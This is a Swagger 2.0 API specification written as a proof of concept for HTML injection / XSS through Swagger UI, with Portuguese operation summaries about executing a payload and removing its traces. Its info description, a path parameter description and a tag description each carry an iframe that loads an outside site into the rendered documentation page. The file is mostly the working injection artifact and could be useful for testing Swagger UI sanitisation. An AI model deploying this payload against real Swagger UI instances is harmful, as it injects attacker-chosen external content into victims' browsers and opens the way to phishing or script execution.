swagger: '2.0'
info:
  title: PoC - XSS via Swagger UI
  description: >
    <iframe src="https://supermario-game.com/mario-game/mario.html" style="width:100%;height:600px;border:none;"></iframe>
  version: vulnerable-demo
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /executarXSS:
    post:
      responses:
        '200':
          description: No response was specified
      tags:
        - executarXSS
      operationId: triggerXSS
      summary: Execute seu payload com um clique
  '/xss/payload/{id}':
    delete:
      parameters:
        - description: >
            <iframe src="https://supermario-game.com/mario-game/mario.html" style="width:100%;height:600px;border:none;"></iframe>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - executarXSS
      operationId: deletePayload
      summary: Remover rastros do payload
definitions:
  '':  # Pode ser removido se quiser evitar warnings de validadores
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
  Payload:
    properties:
      id:
        format: int64
        type: integer
      name:
        type: string
securityDefinitions:
  basicAuth:
    type: basic
tags:
  - name: executarXSS
    description: >
      <iframe src="https://supermario-game.com/mario-game/mario.html" style="width:100%;height:600px;border:none;"></iframe>
